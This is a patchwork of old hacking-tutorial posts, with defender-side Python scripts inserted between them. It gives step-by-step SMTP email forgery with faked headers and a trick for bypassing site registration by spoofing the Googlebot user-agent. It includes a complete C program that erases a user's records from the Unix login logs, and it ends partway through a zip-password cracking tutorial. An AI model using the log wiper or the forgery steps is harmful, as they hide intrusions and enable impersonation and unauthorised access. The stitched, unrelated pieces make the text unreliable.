    TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs, along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.
    NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.

    How to Telnet with Windows XP
    The queen of hacker commands is telnet. To get Windows help for telnet, in the cmd.exe window give the command:
    C:\>telnet /?
    Here's what you will get:
    telnet [-a][-e escape char][-f log file][-l user][-t term][host
    [port]]
    -a Attempt automatic logon. Same as -l option except uses
    the currently logged on user's name.
    -e Escape character to enter telnet client prompt.
    -f File name for client side logging
    -l Specifies the user name to log in with on the remote system.
    Requires that the remote system support the TELNET ENVIRON
    option.
    -t Specifies terminal type.
    Supported term types are vt100, vt52, ansi and vtnt only.
    host Specifies the hostname or IP address of the remote computer
    to connect to.
    port Specifies a port number or service name.
    ****************
    Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn't block it.
    ****************
    ****************
    Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
    ****************
    The simplest use of telnet is to log into a remote computer. Give the command:
    C:\>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)
    If this computer is set up to let people log into accounts, you may get the message:
    login:
    Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.
    ****************
    Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
    ****************
    Then comes the message:
    Password:
    Again, be exact in typing in your password.
    What if this doesn't work?
    Every day people write to me complaining they can't telnet. That is usually because they try to telnet into a computer, or a port on a computer, that is set up to refuse telnet connections. Here's what it might look like when a computer refuses a telnet connection:
    C:\ >telnet 10.0.0.3
    Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
    Or you might see:
    C:\ >telnet techbroker.com
    Connecting To techbroker.com...Could not open connection to the host, on port 23.
    No connection could be made because the target machine actively refused it.
    If you just give the telnet command without giving a port number, it will automatically try to connect on port 23, which sometimes runs a telnet server.
    **************
    Newbie note: your Windows computer has a telnet client program, meaning it will let you telnet out of it. However, you have to install a telnet server before anyone can telnet into port 23 on your computer.
    *************
    If telnet failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Maybe the people who run that computer don't want you to telnet into it.
    How to Telnet into a Shell Account
    Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:
    C:\>telnet freeshell.org 22
    SSH-1.99-OpenSSH_3.4p1
    That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at
    . You can get a free SSH client program from
    .
    One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with the talk command. Another fun thing, if your shell account allows it, is to give the command
    ps -auxww
    It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!
    ***************
    You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
    *************
    Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.
    If I try to telnet to this email program from outside this computer, here's what happens:
    C:\>telnet 10.0.0.3 25
    Connecting To 10.0.0.3...Could not open connection to the host, on port 25.
    No connection could be made because the target machine actively refused it.
    However, if I log into an account on 10.0.0.3 and then telnet from inside to port 25, here's what I get:
    Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
    Have a lot of fun...
    cmeinel@test-box:~> telnet localhost 25
    Trying ::1...
    telnet: connect to address ::1: Connection refused
    Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical
    address meaning localhost, the same computer you are logged into]
    Connected to localhost.
    Escape character is '^]'.
    220 test-box.local ESMTP Postfix
    The reason I keep this port 25 hidden behind a firewall is to keep people from using it to try to break in or to forge email. Now the ubergeniuses reading this will start to make fun of me because no Internet address that begins with 10. is reachable from the Internet. However, sometimes I place this "test-box" computer online with a static Internet address, meaning whenever it is on the Internet, it always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.
    ***************
    Newbie note: What is all this about headers? It's stuff at the beginning of an email that may - or may not - tell you a lot about where it came from and when. To see full headers, in Outlook click view -> full headers. In Eudora, click the "Blah blah blah" icon.
    ****************

    How to Forge Email with Windows XP Telnet
    Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using telnet. Start with the command:
    C:\>telnet techbroker.com 25
    Connecting To Techbroker.com
    220 Service ready
    Now you type in who you want the message to appear to come from:
    helo santa@techbroker.com
    Techbroker.com will answer:
    250 host ready
    Next type in your mail from address:
    mail from:santa@techbroker.com
    250 Requested mail action okay, completed
    Your next command:
    rcpt to:xyz@techbroker.com
    250 Requested mail action okay, completed
    Your next command:
    data
    354 Start main input; end with .
    Newbie note: just means hit return. In case you can't see that little period between the s, what you do to end composing your email is to hit enter, type a period, then hit enter again.
    Anyhow, try typing:
    This is a test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel
    Connection to host lost.
    Using techbroker's mail server, even if you enable full headers, the message we just composed looks like:
    Status: R
    X-status: N
    This is a test.
    That's a pretty pathetic forged email, huh? No "from", no date.
    However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:
    220 Service ready
    helo santa@northpole.org
    250 host ready
    mail from:santa@northpole.com
    250 Requested mail action okay, completed
    rcpt to:
    250 Requested mail action okay, completed
    data
    354 Start main input; end with .
    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
    This is a Santa test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel
    Connection to host lost.
    The message then looks like:
    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
    This is a Santa test.
    The trick is to start each line you want in the headers with one word followed by a colon, and then a line followed by "return". As soon as you write a line that doesn't begin this way, the rest of what you type goes into the body of the email.
    Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
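    An added check from the receiving side (example code written for this page, not part of the guide): given the envelope sender from "mail from:" and the lines typed after "data", it splits headers from body the lenient way the guide describes, then flags the envelope/header mismatch and the missing headers a forged message shows, and prepends the Return-Path line that makes servers "show both from addresses". The sample messages are the guide's two transcripts, retyped here.

```python
"""Envelope-vs-header audit for a message submitted over SMTP.

Added example, not part of the original guide. MAIL FROM gives the
envelope sender; whatever follows DATA is entirely under the sender's
control, so the header From: line can say anything at all.
"""
import re
from typing import Dict, List, Tuple

# A header line, as the guide describes it: one word, a colon, the value.
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):(.*)$")
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


def split_lenient(data_lines: List[str]) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Lines of the form 'Word: value' are headers until the first line that
    is not; everything from that line on is the body (a single separating
    blank line, as a standards-conformant client would send, is dropped)."""
    headers: List[Tuple[str, str]] = []
    body_start = len(data_lines)
    for i, line in enumerate(data_lines):
        m = HEADER_RE.match(line)
        if m is None:
            body_start = i
            break
        headers.append((m.group(1), m.group(2).strip()))
    body = data_lines[body_start:]
    if body and body[0] == "":
        body = body[1:]
    return headers, body


def first_addr(value: str) -> str:
    """Lower-cased first e-mail address in a header or envelope value."""
    m = ADDR_RE.search(value)
    return m.group(0).lower() if m else ""


def audit(envelope_from: str, data_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (code, detail) findings a receiving filter would attach."""
    headers, _body = split_lenient(data_lines)
    hdr: Dict[str, str] = {name.lower(): value for name, value in headers}
    env = first_addr(envelope_from)
    findings: List[Tuple[str, str]] = []
    hdr_from = first_addr(hdr.get("from", ""))
    if not hdr_from:
        findings.append(("no-from-header", "no From: line was supplied after DATA"))
    elif hdr_from != env:
        findings.append(("from-mismatch",
                         f"envelope sender {env} but header From: {hdr_from}"))
    for required in ("date", "message-id"):
        if required not in hdr:
            findings.append((f"missing-{required}", f"no {required} header"))
    return findings


def stamp(envelope_from: str, data_lines: List[str]) -> List[str]:
    """Prepend Return-Path so the envelope sender survives into the stored
    message and the two 'from' values can be compared later."""
    headers, body = split_lenient(data_lines)
    out = [f"Return-Path: <{first_addr(envelope_from)}>"]
    out += [f"{name}: {value}" for name, value in headers]
    return out + [""] + body


# Constructed from the guide's two transcripts.
TEST_DATA = ["This is a test."]
SANTA_DATA = [
    "from:santa@deer.northpole.org",
    "Date: Mon, 21 Oct 2002 10:09:16 -0500",
    "Subject: Rudolf",
    "This is a Santa test.",
]

if __name__ == "__main__":
    for env, lines in (("santa@techbroker.com", TEST_DATA),
                       ("santa@northpole.com", SANTA_DATA)):
        print(f"MAIL FROM:<{env}>")
        for code, detail in audit(env, lines):
            print(f"  {code}: {detail}")
        print("\n".join("  | " + l for l in stamp(env, lines)))
```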
    You can forge email on techbroker.com within one strict limitation. Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.
    Next, you can read the email you forge on techbroker.com via telnet:
    C:\>telnet techbroker.com 110
    +OK <30961.5910984301@techbroker.com> service ready
    Give this command:
    user xyz
    +OK user is known
    Then type in this:
    pass test
    +OK mail drop has 2 message(s)
    retr 1
    +OK message follows
    This is a test.
    If you want to know all possible commands, give this command:
    help
    +OK help list follows
    USER user
    PASS password
    STAT
    LIST [message]
    RETR message
    DELE message
    NOOP
    RSET
    QUIT
    APOP user md5
    TOP message lines
    UIDL [message]
    HELP
    Unless you use a weird online provider like AOL, you can use these same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email sending computer(s).

    Free Access To Websites Without Registering


    Go to http://bugmenot.com/ and type the URL of the website you want to log into.
    Examples: http://www.nytimes.com/, http://www.winnetmag.com/ etcetera.

    Another (and better) way is changing the user agent of your browser to:
    Googlebot/2.1 (+http://www.googlebot.com/bot.html)

    This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
    http://www.chrispederick.com/work/firefox/useragentswitcher/
    and add the Googlebot user agent.

    Have fun, Dead Dreamer!

    -]Edit[- Now this was just browsing an entire forum without even needing to log in to view restricted areas, and it works on other sites.
    And no, you can't access the hidden forums either, already tried that.

    Erasing Your Presence From System Logs On Linux




    Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi; you must use a program specifically written for this purpose.



    Example:



    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #define WTMP_NAME "/usr/adm/wtmp"
    #define UTMP_NAME "/etc/utmp"
    #define LASTLOG_NAME "/usr/adm/lastlog"

    int f;

    void kill_utmp(who)
    char *who;
    {
        struct utmp utmp_ent;

        if ((f=open(UTMP_NAME,O_RDWR))>=0) {
            while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                    bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                    lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                    write (f, &utmp_ent, sizeof (utmp_ent));
                }
            close(f);
        }
    }

    void kill_wtmp(who)
    char *who;
    {
        struct utmp utmp_ent;
        long pos;

        pos = 1L;
        if ((f=open(WTMP_NAME,O_RDWR))>=0) {

            while(pos != -1L) {
                lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
                if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                    pos = -1L;
                } else {
                    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                        bzero((char *)&utmp_ent,sizeof(struct utmp ));
                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                        write (f, &utmp_ent, sizeof (utmp_ent));
                        pos = -1L;
                    } else pos += 1L;
                }
            }
            close(f);
        }
    }

    void kill_lastlog(who)
    char *who;
    {
        struct passwd *pwd;
        struct lastlog newll;

        if ((pwd=getpwnam(who))!=NULL) {

            if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
                lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                bzero((char *)&newll,sizeof( newll ));
                write(f, (char *)&newll, sizeof( newll ));
                close(f);
            }

        } else printf("%s: ?\n",who);
    }

    main(argc,argv)
    int argc;
    char *argv[];
    {
        if (argc==2) {
            kill_lastlog(argv[1]);
            kill_wtmp(argv[1]);
            kill_utmp(argv[1]);
            printf("Zap2!\n");
        } else
            printf("Error.\n");
    }
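
    A defender-side counterpart, added here and not part of the original post: the program above blanks the matching record in place rather than removing it, so a wtmp that has been through it contains an all-zero record where a login used to be, usually followed by a logout record with no matching login. This scanner parses Linux wtmp records (the glibc x86_64 layout is an assumption about the file's origin; the program above targets an older BSD-style utmp with ut_name) and reports both signs, using a constructed sample in place of a real file.

```python
"""Find records blanked in place in a Linux wtmp/utmp file.

Added example, not from the original post. Run with a path to scan a
real file; without arguments it scans the constructed sample below.
"""
import struct
import sys
from dataclasses import dataclass
from typing import List

# glibc struct utmp on x86_64 Linux, 384 bytes (assumption; the post's
# program was written against an older layout).
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
ZERO_RECORD = b"\0" * UTMP_SIZE
USER_PROCESS, DEAD_PROCESS = 7, 8


@dataclass
class Record:
    index: int
    ut_type: int
    pid: int
    line: str
    user: str
    host: str
    tv_sec: int


def _cstr(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_records(data: bytes) -> List[Record]:
    """Decode every fixed-size record in the file image."""
    if len(data) % UTMP_SIZE:
        raise ValueError("file length is not a multiple of the utmp record size")
    recs: List[Record] = []
    for i in range(len(data) // UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, data[i * UTMP_SIZE:(i + 1) * UTMP_SIZE])
        # f: type, pid, line, id, user, host, e_term, e_exit, session, tv_sec, ...
        recs.append(Record(i, f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5]), f[9]))
    return recs


def find_zapped(data: bytes) -> List[int]:
    """Indices of all-zero records. wtmp is append-only and every genuine
    record carries a type and a timestamp, so an all-zero record is a hole
    left by zeroing an entry in place."""
    return [i for i in range(len(data) // UTMP_SIZE)
            if data[i * UTMP_SIZE:(i + 1) * UTMP_SIZE] == ZERO_RECORD]


def orphan_logouts(recs: List[Record]) -> List[Record]:
    """DEAD_PROCESS records whose pid/line never appeared in a USER_PROCESS
    record: the logout survives when only the login record was blanked,
    because the logout record no longer carries the user name."""
    seen = set()
    orphans: List[Record] = []
    for r in recs:
        if r.ut_type == USER_PROCESS:
            seen.add((r.pid, r.line))
        elif r.ut_type == DEAD_PROCESS and (r.pid, r.line) not in seen:
            orphans.append(r)
    return orphans


def report(data: bytes) -> List[str]:
    lines = [f"record {i}: all-zero (blanked in place)" for i in find_zapped(data)]
    lines += [f"record {r.index}: logout of pid {r.pid} on {r.line} has no matching login"
              for r in orphan_logouts(parse_records(data))]
    return lines


def make_record(ut_type: int, pid: int, line: str, ident: str,
                user: str, host: str, tv_sec: int) -> bytes:
    """Build one record for the constructed sample."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ident.encode(),
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


# Constructed sample: a boot, alice's session, and bob's session after the
# program above was run against "bob" (his login record is now all zeros).
SAMPLE_WTMP = b"".join([
    make_record(2, 0, "~", "~~", "reboot", "5.10.0", 1700000000),
    make_record(USER_PROCESS, 1234, "pts/0", "ts/0", "alice", "10.0.0.1", 1700000100),
    ZERO_RECORD,
    make_record(DEAD_PROCESS, 1234, "pts/0", "ts/0", "", "", 1700000900),
    make_record(DEAD_PROCESS, 1300, "pts/1", "ts/1", "", "", 1700001000),
])

if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_WTMP
    print("\n".join(report(image)) or "no anomalies")
```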


    Disable Windows Logo Key


    I was recently playing games and this nasty Windows logo key kept annoying me, because I often accidentally pressed it, so I started searching for a solution to my problem, found the following way, and it did work. Hope this helps, thanks!



    You can copy the following into Notepad, save it as *.reg, and use it.

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
    "Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
    00,00,00,00

    Disable The Send Error Report to Microsoft

    To disable the feature in WinXP which tries to send a report to Microsoft every time a program crashes (this sensitive information is very valuable to hackers, so disable it), you will have to do this:

    *************************************************************************

    Open Control Panel
    Click on Performance and Maintenance.
    Click on System.
    Then click on the Advanced tab
    Click on the error reporting button on the bottom of the windows.
    Select Disable error reporting.
    Click OK
    Click OK

    *************************************************************************

    Disable Compression On Windows Xp NTFS partition Disk Cleanup


    On an NTFS partition, Disk Cleanup can compress old files to save space. But calculating the savings and performing the compression often take a long time, and on some systems, Disk Cleanup hangs during the process. If that happens, or if you don't care to wait, use this Registry tweak to disable the compression: Delete the key
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

    Delete An undeletable File


    Open a Command Prompt window and leave it open.
    Close all open programs.
    Click Start, Run and enter TASKMGR.EXE
    Go to the Processes tab and End Process on Explorer.exe.
    Leave Task Manager open.
    Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
    At the command prompt type DEL filename, where filename is the file you wish to delete.
    Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
    Close Task Manager.


    Or you can try this

    Open Notepad.exe

    Click File>Save As..>

    Locate the folder where your undeletable file is.

    Choose 'All files' from the file type box.

    Click once on the file you want to delete so its name appears in the 'filename' box.

    Put a " at the start and end of the filename
    (the filename should have the extension of the undeletable file so it will overwrite it).

    Click save.

    It should ask you to overwrite the existing file; choose yes, and you can delete it as normal.


    Here's a manual way of doing it. I'll take this off once you put it into your first post, zain.

    1. Start
    2. Run
    3. Type: command
    4. To move into a directory type: cd c:\*** (The stars stand for your folder)
    5. If you cannot access the folder because it has spaces, for example Program Files or the Kazaa Lite folder, you have to do the following: instead of typing in the full folder name, take only the first 6 letters, then put a ~ and then 1, without spaces. Example: cd c:\progra~1\kazaal~1
    6. Once you're in the folder the non-deletable file is in, type dir - a list will come up with everything inside.
    7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special "first 6 letters followed by a ~ and a 1" rule. Example: if your file name was bad file.bmp you would type, once in the specific folder through command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

    Create Bootable XP SP integrated CD

    Slipstreaming Windows XP Service Pack 1a and Create Bootable CD

    Slipstreaming a Service Pack, is the process to integrate the Service Pack into the installation so that with every new installation the Operating System and Service Pack are installed at the same time.

    Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for the home user or small business user to do the same.

    Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)install your OS, you don't have to apply the Service Pack later, also if you update any Windows component later, you'll be sure that you get the correct installation files if Windows needs any.


    Slipstream Windows XP Service Pack 1a:
    http://download.microsoft.com/download/5/4/f/54f8bcf8-bb4d-4613-8ee7-db69d01735ed/xpsp1a_en_x86.exe


    Download the (full) "Network Install" of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in my case D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.

    Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack does no longer include Microsoft's dated Java version. If you have already installed Windows XP SP1, there is no reason to install SP1a, but the "older" SP1 (with MS Java) is no longer available for download.

    Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in that folder.

    Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Start > Run > cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command: servicepack filename -x. A small window will appear, and you need to point it to the folder where you want to extract the SP1 files. Click Ok to start extracting the SP1a files.

    Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:<path to WinXP CD files>. In my example the command is update /s:D:\XP-CD.

    Windows XP Update will do its thing:

    When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.

    It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.


    Creating a Bootable CD
    For this part I used ISO Buster
    http://www.smart-projects.net/isobuster/

    and Nero Burning.

    Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the "folder" Bootable CD, and right-click Microsoft Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your Windows XP files (D:\XP-CD in my case).

    Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source of boot image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changing the Number of loaded sectors to 4 (otherwise it won't boot!)


    If you have an older version of Nero you won't have the option Do Not Add ";1" ISO file version extension under Relax ISO Restrictions. You won't be able to boot your new CD, so update Nero!
    You can configure the Label tab to your liking, I would however recommend that you keep the Volume Label the same as on your original Windows XP CD.

    Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.

    Next, burn your new CD.

    You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!

    Create A Personal Screen Saver In Win Xp

    This isn't a tweak, but a great little feature! For a great way to put your digital photos to work, try creating a slide show presentation for use as a screen saver. Here's how:

    1. Right-click an empty spot on your desktop and then click Properties.

    2. Click the Screen Saver tab.

    3. In the Screen saver list, click My Pictures Slideshow.

    4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.

    Now your screen saver is a random display of the pictures taken from your My Pictures folder.

    How to set-up the firewall & Configure it

    Configuring Crap Software Pro


    --------------------------------------
    Configuring The Standard Settings

    Your first configuration of Crap Software should be like this:

    Launch Crap Software Pro and click to highlight the "Overview" tab on the left hand side. In the pane that appears on the right hand side click the "Preferences" tab and in the section "Check for updates" check "Manually".

    In the "General" section you can also configure Crap Software to load at start up, which is advisable because this software is your first line of defence against uninvited invasion of your computer by a whole gamut of viruses, spyware, adware and bots! Virus checking software does have its place, but remember that prevention is always better than a cure!

    Crap Software Pro's program control is automatically configured. When you run it for the first time it will ask on behalf of programs installed on your system for permission to access the Internet. Your browser will be the first to request - just tick the "Yes" box and the "Remember this setting" box and Crap Software will always allow your browser access automatically.

    Unless you use online databases etc., there should be no reason for any application other than a browser, email client, ftp client, streaming media player or a download manager to gain access to the Internet.

    So consider what type of program it is that needs Internet access before giving Crap Software permission to allow it. If it is just a driver file (.DLL) that requests Internet access, always search Windows to try and identify it. Many pseudo-viruses such as AdWare and sub class seven Trojans access the Internet from your system using .dll files.
    ----------------------------------------------

    Configuring The Advanced Settings

    If you are not on a LAN (connected to another computer in a network)
    you can use this guide to give your firewall some real muscle:

    Launch Crap Software Pro and click to highlight the "Firewall" tab on
    the left hand side . In the pane that appears on the right hand side
    in the section "Internet Zone Security" set the slider control to "High"
    Then click the "Custom" button in the same section.
    The next settings page is divided into two sections with tabs Internet
    Zone and Trusted Zone at the top of the page.

    Under the Internet Zone tab there is a list of settings that can
    be accessed by scrolling.

    At the top is the high security settings and the only thing that should
    check from there is "allow broadcast/multicast".
    The rest should be unchecked

    Scroll down until you get to the medium security settings area.
    Check all the boxes in this section until you get to "Block Incomming
    UDP Ports". When you check that you will be asked to supply
    a list of ports, and in the field at the bottom of the page enter
    1-65535

    Then go back to the list and check the box alongside "Block
    Outgoing UDP Ports" and at the bottom of the page enter
    1-19, 22-79, 82-7999, 8082-65535

    Repeat this proceedure for the following settings
    "Block Incomming TCP Ports": 1-65535
    "Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
    Then click "Apply", "Ok" at the bottom of the page.

    Back in the right hand "Firewall" pane go next to the yellow
    "Trusted Zone Security" section and set it to "High" with the slider.
    Click "Custom" and repeat the ABOVE procedure, this time choosing
    the *Trusted Zone* tab at the top of the settings page.

    These settings will stop all incoming packets at ports 1-65535
    and also block all pings, trojans etc. These settings will also stop all
    spyware or applications from phoning home from your drive without your knowledge!
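    As an added example (not from the guide, and not Crap Software's own code), here is a small Python script that parses the port lists the guide tells you to type into the four "Block ... Ports" fields and works out which ports they still leave open, so you can check the lists against what your own machine needs.

```python
"""Parse the port-range lists from the firewall guide above and report the
ports that remain open. Added example; not part of the original guide."""


def parse_port_ranges(spec):
    """Turn '1-19, 22-79, 82-7999, 8082-65535' into a sorted list of
    (low, high) tuples. A bare number is treated as a one-port range."""
    ranges = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            low, high = (int(part) for part in item.split("-", 1))
        else:
            low = high = int(item)
        if not (1 <= low <= high <= 65535):
            raise ValueError(f"bad port range: {item!r}")
        ranges.append((low, high))
    return sorted(ranges)


def is_blocked(port, ranges):
    """True if the port falls inside any blocked range."""
    return any(low <= port <= high for low, high in ranges)


def open_ports(ranges):
    """Return the gaps in the blocked list, i.e. the ports the firewall
    still lets through (1-65535 minus the blocked ranges)."""
    gaps = []
    cursor = 1
    for low, high in ranges:
        if low > cursor:
            gaps.append((cursor, low - 1))
        cursor = max(cursor, high + 1)
    if cursor <= 65535:
        gaps.append((cursor, 65535))
    return gaps


# The exact lists the guide gives for the "Block ... Ports" fields.
INCOMING_SPEC = "1-65535"
OUTGOING_SPEC = "1-19, 22-79, 82-7999, 8082-65535"

if __name__ == "__main__":
    incoming = parse_port_ranges(INCOMING_SPEC)
    outgoing = parse_port_ranges(OUTGOING_SPEC)
    print("incoming ports left open:", open_ports(incoming))
    print("outgoing ports left open:", open_ports(outgoing))
    # Services a practitioner usually relies on; two of them sit inside
    # the guide's outgoing block list.
    for name, port in [("ftp", 21), ("dns", 53), ("http", 80), ("https", 443)]:
        print(f"{name:5} {port:5} blocked={is_blocked(port, outgoing)}")
```

    With the guide's outgoing list only ports 20-21, 80-81 and 8000-8081 stay open, so HTTPS (443) and DNS (53) fall inside the blocked ranges; verify that against what your own machine needs before applying it.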

    Get Back your Lost Zip Files Password

    Tutorial On Getting Back your Lost Zip Files Password

    What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
    FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks: instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com).
    FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
    The first thing I want to say is that reading this tutorial is the easy way to learn how to use this program, but after reading this part on how to use FZC you should go and check the texts that come with the program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
    FZC is a good password recovery tool, because it's very fast and also supports resuming, so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or uppercase letter or a symbol such as ! or &), because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal.. heehhe.. To see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
    FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
    Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait... and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and then remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

